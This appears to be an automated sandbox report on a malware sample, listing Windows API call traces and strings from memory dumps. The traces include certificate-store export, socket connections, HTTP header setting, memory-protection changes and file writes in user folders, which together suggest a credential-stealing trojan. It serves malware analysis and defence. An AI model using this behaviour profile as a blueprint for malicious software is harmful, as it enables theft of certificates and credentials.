memset.MSVCRT ref: 00C34A18

Part of subcall function 00C53D5A: memcpy.MSVCRT ref: 00C53D94

CharLowerW.USER32 ref: 00C34A5C
CharUpperW.USER32(?,?,00000001), ref: 00C34A6D
CharLowerW.USER32 ref: 00C34A81
CharUpperW.USER32(?,00000001), ref: 00C34A8B
memcmp.MSVCRT ref: 00C34AA0

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD7B1D, Relevance: 9.1, APIs: 6, Instructions: 141

APIs

Part of subcall function 00FD568C: TlsSetValue.KERNEL32(00000001,00FD638A), ref: 00FD5699

Part of subcall function 00FCF99C: ResetEvent.KERNEL32 ref: 00FCF9B8

WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00FD7B63
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00FD7B6D
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00FD7C76
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00FD7C7F
UnregisterWait.KERNEL32(?), ref: 00FD7CA4
TlsSetValue.KERNEL32(00000000), ref: 00FD7CCF

Part of subcall function 00FCF9C5: memcpy.MSVCRT ref: 00FCF9DA
Part of subcall function 00FCF9C5: SetEvent.KERNEL32 ref: 00FCF9EA

Part of subcall function 00FCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00FCF82D

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C37B1D, Relevance: 9.1, APIs: 6, Instructions: 141

APIs

Part of subcall function 00C3568C: TlsSetValue.KERNEL32(00000001,00C554A7), ref: 00C35699

Part of subcall function 00C2F99C: ResetEvent.KERNEL32 ref: 00C2F9B8

WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00C37B63
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00C37B6D
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00C37C76
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00C37C7F
UnregisterWait.KERNEL32(?), ref: 00C37CA4
TlsSetValue.KERNEL32(00000000), ref: 00C37CCF

Part of subcall function 00C2F9C5: memcpy.MSVCRT ref: 00C2F9DA
Part of subcall function 00C2F9C5: SetEvent.KERNEL32 ref: 00C2F9EA

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C324AA, Relevance: 9.1, APIs: 6, Instructions: 91

APIs

CertOpenSystemStoreW.CRYPT32(00000000), ref: 00C324BC
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00C324DA
CertEnumCertificatesInStore.CRYPT32(?,?,?,00000000), ref: 00C324E7
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000), ref: 00C3251B

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000,00000004,?,?,?,00000000), ref: 00C3254D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C3258C: GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00C325BA
Part of subcall function 00C3258C: GetSystemTime.KERNEL32(?), ref: 00C3260D
Part of subcall function 00C3258C: CharLowerW.USER32(?), ref: 00C3265D
Part of subcall function 00C3258C: PathRenameExtensionW.SHLWAPI(?,?), ref: 00C3268D

CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00C3257C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDD694, Relevance: 9.1, APIs: 6, Instructions: 79

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000004,00FDD7B9,00000000,?,?,?,?,?,?,00FDC499,?,00000000), ref: 00FDD69E
HeapCreate.KERNEL32(00040001,00000000,00000000), ref: 00FDD6DB
HeapAlloc.KERNEL32(?,00000000,0000000B,?,?,?,?,00000004,00FDD7B9,00000000), ref: 00FDD6F8
HeapFree.KERNEL32(?,00000000,?,?,00000000,0000000B,?,?,?,?,00000004,00FDD7B9,00000000), ref: 00FDD720
memcpy.MSVCRT ref: 00FDD730

Part of subcall function 00FD599B: EnterCriticalSection.KERNEL32(010027DC,00000000,00FCD9CE,01111E90,?,?,?,00FD1992,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD59A7
Part of subcall function 00FD599B: LeaveCriticalSection.KERNEL32(010027DC,?,?,?,00FD1992,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD59B7

Part of subcall function 00FD09C2: GetCurrentThreadId.KERNEL32 ref: 00FD09D3
Part of subcall function 00FD09C2: memcpy.MSVCRT ref: 00FD0B42
Part of subcall function 00FD09C2: memset.MSVCRT ref: 00FD0BA8
Part of subcall function 00FD09C2: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00FD0BBD
Part of subcall function 00FD09C2: GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00FD0BC7

Part of subcall function 00FD59C5: LeaveCriticalSection.KERNEL32(010027DC,00FD5A45,00000002,?,?,?,00FCDAA2,00000002,00000001,000000FF), ref: 00FD59CF

Part of subcall function 00FD59D6: LeaveCriticalSection.KERNEL32(010027DC,?,00FCD9F7,00000009,01111E90,?,?,?,00FD1992,?,?,?,?,00FE48EB), ref: 00FD59E3

LeaveCriticalSection.KERNEL32(?,?,00000000,0000000B,?,?,?,?,00000004,00FDD7B9,00000000), ref: 00FDD774

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3D694, Relevance: 9.1, APIs: 6, Instructions: 79

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000004,00C3D7B9,00000000,?,?,?,?,?,?,00C3C499,?,00000000), ref: 00C3D69E
HeapCreate.KERNEL32(00040001,00000000,00000000), ref: 00C3D6DB
HeapAlloc.KERNEL32(?,00000000,0000000B,?,?,?,?,00000004,00C3D7B9,00000000), ref: 00C3D6F8
HeapFree.KERNEL32(?,00000000,?,?,00000000,0000000B,?,?,?,?,00000004,00C3D7B9,00000000), ref: 00C3D720
memcpy.MSVCRT ref: 00C3D730

Part of subcall function 00C3599B: EnterCriticalSection.KERNEL32(00C627DC,00000000,00C2D9CE,00F41E90,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C359A7
Part of subcall function 00C3599B: LeaveCriticalSection.KERNEL32(00C627DC,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C359B7

Part of subcall function 00C309C2: GetCurrentThreadId.KERNEL32 ref: 00C309D3
Part of subcall function 00C309C2: memcpy.MSVCRT ref: 00C30B42
Part of subcall function 00C309C2: memset.MSVCRT ref: 00C30BA8
Part of subcall function 00C309C2: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00C30BBD
Part of subcall function 00C309C2: GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00C30BC7

Part of subcall function 00C359C5: LeaveCriticalSection.KERNEL32(00C627DC,00C35A45,00000002,?,?,?,00C2DAA2,00000002,00000001,000000FF), ref: 00C359CF

Part of subcall function 00C359D6: LeaveCriticalSection.KERNEL32(00C627DC,?,00C2D9F7,00000009,00F41E90,?,?,?,00C31992,?,?,?,?,00C448EB), ref: 00C359E3

LeaveCriticalSection.KERNEL32(?,?,00000000,0000000B,?,?,?,?,00000004,00C3D7B9,00000000), ref: 00C3D774

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF5BA7, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 72

APIs

lstrcmpA.KERNEL32(?,?\C), ref: 00FF5BC4
lstrcpyW.KERNEL32(00FF597D), ref: 00FF5BD6
lstrcmpA.KERNEL32(?,00FC939C), ref: 00FF5BE9
StrCmpNA.SHLWAPI(?,00FC9394,00000002), ref: 00FF5BFF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00FF5C2A

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

Strings

?\C, xrefs: 00FF5BBC

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C55BA7, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 72

APIs

lstrcmpA.KERNEL32(?,?\C), ref: 00C55BC4
lstrcpyW.KERNEL32(00C5597D), ref: 00C55BD6
lstrcmpA.KERNEL32(?,00C2939C), ref: 00C55BE9
StrCmpNA.SHLWAPI(?,00C29394,00000002), ref: 00C55BFF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00C55C2A

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

Strings

?\C, xrefs: 00C55BBC

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCC41C, Relevance: 9.1, APIs: 5, Instructions: 137

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCC44D

Part of subcall function 00FED0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00FED0B5

WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCC4DF

Part of subcall function 00FCBFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00FCC08A
Part of subcall function 00FCBFFE: GetHandleInformation.KERNEL32(?,?), ref: 00FCC09C
Part of subcall function 00FCBFFE: socket.WS2_32(?,00000001,00000006), ref: 00FCC0CF
Part of subcall function 00FCBFFE: socket.WS2_32(?,00000002,00000011), ref: 00FCC0E0
Part of subcall function 00FCBFFE: closesocket.WS2_32(00000002), ref: 00FCC0FF
Part of subcall function 00FCBFFE: closesocket.WS2_32 ref: 00FCC106
Part of subcall function 00FCBFFE: memset.MSVCRT ref: 00FCC1C8
Part of subcall function 00FCBFFE: memcpy.MSVCRT ref: 00FCC3C8

SetEvent.KERNEL32 ref: 00FCC532
SetEvent.KERNEL32 ref: 00FCC56B

Part of subcall function 00FED090: SetEvent.KERNEL32 ref: 00FED0A0

Part of subcall function 00FCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00FCF82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00FCC5F0

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2C41C, Relevance: 9.1, APIs: 5, Instructions: 137

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C44D

Part of subcall function 00C4D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C4D0B5

WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C4DF

Part of subcall function 00C2BFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00C2C08A
Part of subcall function 00C2BFFE: GetHandleInformation.KERNEL32(?,?), ref: 00C2C09C
Part of subcall function 00C2BFFE: socket.WS2_32(?,00000001,00000006), ref: 00C2C0CF
Part of subcall function 00C2BFFE: socket.WS2_32(?,00000002,00000011), ref: 00C2C0E0
Part of subcall function 00C2BFFE: closesocket.WS2_32(00000002), ref: 00C2C0FF
Part of subcall function 00C2BFFE: closesocket.WS2_32 ref: 00C2C106
Part of subcall function 00C2BFFE: memset.MSVCRT ref: 00C2C1C8
Part of subcall function 00C2BFFE: memcpy.MSVCRT ref: 00C2C3C8

SetEvent.KERNEL32 ref: 00C2C532
SetEvent.KERNEL32 ref: 00C2C56B

Part of subcall function 00C4D090: SetEvent.KERNEL32 ref: 00C4D0A0

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00C2C5F0

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE53C3, Relevance: 9.1, APIs: 6, Instructions: 61

APIs

Part of subcall function 00FE48F2: GetModuleHandleW.KERNEL32 ref: 00FE4932
Part of subcall function 00FE48F2: WSAStartup.WS2_32(00000202,?), ref: 00FE4998
Part of subcall function 00FE48F2: CreateEventW.KERNEL32(01002974,00000001), ref: 00FE49BA
Part of subcall function 00FE48F2: GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00FE49EC
Part of subcall function 00FE48F2: GetCurrentProcessId.KERNEL32 ref: 00FE4A17

SetErrorMode.KERNEL32(00008007), ref: 00FE53DC
GetCommandLineW.KERNEL32 ref: 00FE53E8
CommandLineToArgvW.SHELL32 ref: 00FE53EF
LocalFree.KERNEL32 ref: 00FE542C
ExitProcess.KERNEL32(00000001), ref: 00FE543D

Part of subcall function 00FE5087: CreateMutexW.KERNEL32(01002974,00000001,?), ref: 00FE512D
Part of subcall function 00FE5087: GetLastError.KERNEL32(?,?,00000001,?,?,?,00FE5452), ref: 00FE513D
Part of subcall function 00FE5087: CloseHandle.KERNEL32 ref: 00FE514B
Part of subcall function 00FE5087: lstrlenW.KERNEL32(?), ref: 00FE51AD
Part of subcall function 00FE5087: ExitWindowsEx.USER32(00000014,80000000), ref: 00FE51DD
Part of subcall function 00FE5087: OpenEventW.KERNEL32(00000002,00000000,?), ref: 00FE5203
Part of subcall function 00FE5087: SetEvent.KERNEL32 ref: 00FE5210
Part of subcall function 00FE5087: CloseHandle.KERNEL32 ref: 00FE5217
Part of subcall function 00FE5087: CloseHandle.KERNEL32 ref: 00FE5229
Part of subcall function 00FE5087: IsWellKnownSid.ADVAPI32(01111EC0,00000016), ref: 00FE5279
Part of subcall function 00FE5087: CreateEventW.KERNEL32(01002974,00000001,00000000,?), ref: 00FE5348
Part of subcall function 00FE5087: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FE5361
Part of subcall function 00FE5087: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FE5373
Part of subcall function 00FE5087: CloseHandle.KERNEL32(00000000), ref: 00FE538A
Part of subcall function 00FE5087: CloseHandle.KERNEL32(?), ref: 00FE5390
Part of subcall function 00FE5087: CloseHandle.KERNEL32(?), ref: 00FE5396

Sleep.KERNEL32(000000FF), ref: 00FE5463

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FE027E, Relevance: 9.0, APIs: 5, Instructions: 119

APIs

#8.OLEAUT32(?,?,00FC1618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00FE0301

Part of subcall function 00FD1BDD: #6.OLEAUT32 ref: 00FD1BE7
Part of subcall function 00FD1BDD: #2.OLEAUT32(ProhibitDTD), ref: 00FD1BF5

#6.OLEAUT32(00000000,?,00FC1618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00FE0350
#8.OLEAUT32(?), ref: 00FE035B
#2.OLEAUT32(?), ref: 00FE036D
#9.OLEAUT32(?), ref: 00FE03A4

Part of subcall function 00FF07B1: CoCreateInstance.OLE32(00FC17F8,00000000,00004401,00FC1858,?), ref: 00FF07C6

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4027E, Relevance: 9.0, APIs: 5, Instructions: 119

APIs

#8.OLEAUT32(?,?,00C21618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00C40301

Part of subcall function 00C31BDD: #6.OLEAUT32 ref: 00C31BE7
Part of subcall function 00C31BDD: #2.OLEAUT32(ProhibitDTD), ref: 00C31BF5

#6.OLEAUT32(00000000,?,00C21618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00C40350
#8.OLEAUT32(?), ref: 00C4035B
#2.OLEAUT32(?), ref: 00C4036D
#9.OLEAUT32(?), ref: 00C403A4

Part of subcall function 00C507B1: CoCreateInstance.OLE32(00C217F8,00000000,00004401,00C21858,?), ref: 00C507C6

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351EFB6, Relevance: 9.0, APIs: 5, Instructions: 74

APIs

EncodePointer.KERNEL32(?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351EFCB
EncodePointer.KERNEL32(?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351EFD8

Part of subcall function 03520896: HeapSize.KERNEL32(00000000,00000000,?,0351EFF6,?,?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?), ref: 035208C1

Part of subcall function 0351FF71: Sleep.KERNEL32(00000000), ref: 0351FF9B

EncodePointer.KERNEL32(?,?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351F03D
EncodePointer.KERNEL32(?,?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351F051
EncodePointer.KERNEL32(?,?,?,?,?,?,0351F0BA,?,0353EF98,0000000C,0351F0E6,?,?,0351D653,0351E22F), ref: 0351F059

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FD9925, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 71

APIs

memcpy.MSVCRT ref: 00FD993C

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

memcmp.MSVCRT ref: 00FD995E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FD998C

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

lstrcmpiW.KERNEL32(?), ref: 00FD99DC

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FD99AD

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C39925, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 71

APIs

memcpy.MSVCRT ref: 00C3993C

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

memcmp.MSVCRT ref: 00C3995E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C3998C

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

lstrcmpiW.KERNEL32(?), ref: 00C399DC

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00C399AD

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF2B3C, Relevance: 9.0, APIs: 5, Instructions: 69

APIs

Part of subcall function 00FF27C1: socket.WS2_32(?,?,00000006), ref: 00FF27F5

connect.WS2_32(?,?), ref: 00FF2B7A
WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00FF2B89
WSASetLastError.WS2_32(?), ref: 00FF2BE7

Part of subcall function 00FF2968: shutdown.WS2_32(?,00000002), ref: 00FF2976
Part of subcall function 00FF2968: closesocket.WS2_32(?), ref: 00FF297F
Part of subcall function 00FF2968: WSACloseEvent.WS2_32(?), ref: 00FF2992

Part of subcall function 00FF2917: WSACreateEvent.WS2_32(00000000,?,00FF2C15,?,00000000,?,00FF2CD1,?,?,?,?,00000000), ref: 00FF292D
Part of subcall function 00FF2917: WSAEventSelect.WS2_32(?,?,00FF2CD1), ref: 00FF2943
Part of subcall function 00FF2917: WSACloseEvent.WS2_32(?), ref: 00FF2957

WSASetLastError.WS2_32 ref: 00FF2BA7
WSAGetLastError.WS2_32 ref: 00FF2BA9

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C52B3C, Relevance: 9.0, APIs: 5, Instructions: 69

APIs

Part of subcall function 00C527C1: socket.WS2_32(?,?,00000006), ref: 00C527F5

connect.WS2_32(?,?), ref: 00C52B7A
WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00C52B89
WSASetLastError.WS2_32(?), ref: 00C52BE7

Part of subcall function 00C52968: shutdown.WS2_32(?,00000002), ref: 00C52976
Part of subcall function 00C52968: closesocket.WS2_32(?), ref: 00C5297F
Part of subcall function 00C52968: WSACloseEvent.WS2_32(?), ref: 00C52992

Part of subcall function 00C52917: WSACreateEvent.WS2_32(00000000,?,00C52C15,?,00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C5292D
Part of subcall function 00C52917: WSAEventSelect.WS2_32(?,?,00C52CD1), ref: 00C52943
Part of subcall function 00C52917: WSACloseEvent.WS2_32(?), ref: 00C52957

WSASetLastError.WS2_32 ref: 00C52BA7
WSAGetLastError.WS2_32 ref: 00C52BA9

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD1791, Relevance: 9.0, APIs: 5, Instructions: 66

APIs

InitializeCriticalSection.KERNEL32(01003510), ref: 00FD17B1

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

InitializeCriticalSection.KERNEL32 ref: 00FD17C6
memset.MSVCRT ref: 00FD17DB
TlsAlloc.KERNEL32(?,00000000,00FE4986,?,?,00000001), ref: 00FD17F2
GetModuleHandleW.KERNEL32(?), ref: 00FD1817

Part of subcall function 00FD8DB0: EnterCriticalSection.KERNEL32(01003510,01111E90,00FD1829,?,00000000,00FE4986,?,?,00000001), ref: 00FD8DC0
Part of subcall function 00FD8DB0: LeaveCriticalSection.KERNEL32(01003510,?,00000000,00FE4986,?,?,00000001), ref: 00FD8DE8

Part of subcall function 00FD1857: TlsFree.KERNEL32(?), ref: 00FD1863
Part of subcall function 00FD1857: DeleteCriticalSection.KERNEL32(01111E90,00000000,00FD1851,01111E90,?,00000000,00FE4986,?,?,00000001), ref: 00FD186A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C31791, Relevance: 9.0, APIs: 5, Instructions: 66

APIs

InitializeCriticalSection.KERNEL32(00C63510), ref: 00C317B1

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

InitializeCriticalSection.KERNEL32 ref: 00C317C6
memset.MSVCRT ref: 00C317DB
TlsAlloc.KERNEL32(?,00000000,00C44986,?,?,00000001), ref: 00C317F2
GetModuleHandleW.KERNEL32(?), ref: 00C31817

Part of subcall function 00C38DB0: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C31829,?,00000000,00C44986,?,?,00000001), ref: 00C38DC0
Part of subcall function 00C38DB0: LeaveCriticalSection.KERNEL32(00C63510,?,00000000,00C44986,?,?,00000001), ref: 00C38DE8

Part of subcall function 00C31857: TlsFree.KERNEL32(00000011), ref: 00C31863
Part of subcall function 00C31857: DeleteCriticalSection.KERNEL32(00F41E90,00000000,00C31851,00F41E90,?,00000000,00C44986,?,?,00000001), ref: 00C3186A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE0799, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72

APIs

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE07CF

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

lstrcatW.KERNEL32(?,.dat), ref: 00FE082F
lstrlenW.KERNEL32 ref: 00FE0844

Part of subcall function 00FD1AAE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00FD1ACA
Part of subcall function 00FD1AAE: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00FD1AED
Part of subcall function 00FD1AAE: CloseHandle.KERNEL32 ref: 00FD1AFA

Part of subcall function 00FCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00FCE82F
Part of subcall function 00FCE826: DeleteFileW.KERNEL32(?), ref: 00FCE836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00FE07F0
.dat, xrefs: 00FE0823

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C40799, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72

APIs

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00C407CF

Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4439E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI ref: 00C443A8
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C443F1
Part of subcall function 00C4432D: memcpy.MSVCRT ref: 00C4441E
Part of subcall function 00C4432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00C44428

lstrcatW.KERNEL32(?,.dat), ref: 00C4082F
lstrlenW.KERNEL32 ref: 00C40844

Part of subcall function 00C31AAE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00C31ACA
Part of subcall function 00C31AAE: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C31AED
Part of subcall function 00C31AAE: CloseHandle.KERNEL32 ref: 00C31AFA

Part of subcall function 00C2E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00C2E82F
Part of subcall function 00C2E826: DeleteFileW.KERNEL32(?), ref: 00C2E836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00C407F0
.dat, xrefs: 00C40823

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF07DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71

APIs

InternetSetOptionA.WININET(?,00000003,00FC6FA4,00000004), ref: 00FF0805

Part of subcall function 00FE6FD3: EnterCriticalSection.KERNEL32(01003510,?,00FE4693,?,00FE49A5,?,?,00000001), ref: 00FE6FE3
Part of subcall function 00FE6FD3: LeaveCriticalSection.KERNEL32(01003510,?,00FE4693,?,00FE49A5,?,?,00000001), ref: 00FE7009

GetAcceptLanguagesA.SHLWAPI ref: 00FF084C
memcpy.MSVCRT ref: 00FF0886
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 00FF08BF

Strings

Accept-Language: , xrefs: 00FF0880

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

